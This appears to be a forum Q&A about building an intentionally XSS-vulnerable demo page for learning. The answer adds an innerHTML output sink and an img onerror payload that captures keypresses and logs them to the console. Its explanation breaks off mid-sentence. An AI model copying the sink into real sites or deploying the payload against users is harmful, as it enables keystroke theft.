I want to create an website which is vulnerable to an XSS attack where the attacker tries to inject an keylogger who logs the keystrokes of every victim on this website.
Here is the deployed website and following the code:
function submitted(){
alert("Submitted!");
}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<script src="index.js"></script>
</head>
<body>
<h1>XSS keylogger test website</h1>
<form id="form">
<input type="text" id="fname" name="fname">
<input type="submit" value="Submit" onclick="submitted()">
</form>
</body>
</html>
An example of an JS script which contains code for an keyboard logger who could be injected:
<script>
function keyPressed(){
alert("key pressed");
}
window.captureEvents (Event.KEYPRESS);
window.onkeypress=keyPressed;
</script>
If I just put the code in the input field nothing happens. How can I embed the code into the website that it actually works?
INFO
The project is only used for demonstration and learning purposes.
keylogger who logs the keystrokes of every victim on this website.
Given your setup, that isn't really how XSS works. XSS works by either:
const fname = document.querySelector('#fname');
function submitted(){
document.querySelector('.current-input-text').innerHTML = 'You submitted: ' + fname.value;
fname.value = '';
}
fname.value = `
<img src="bad" onerror='window.onkeypress = (e) => console.log(e.key + " PRESSED");'>`;
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<script src="index.js"></script>
</head>
<body>
<h1>XSS keylogger test website</h1>
<form id="form" onsubmit="return false;">
<input type="text" id="fname" name="fname">
<input type="submit" value="Submit" onclick="submitted()">
</form>
<div class="current-input-text"></div>
</body>
</html>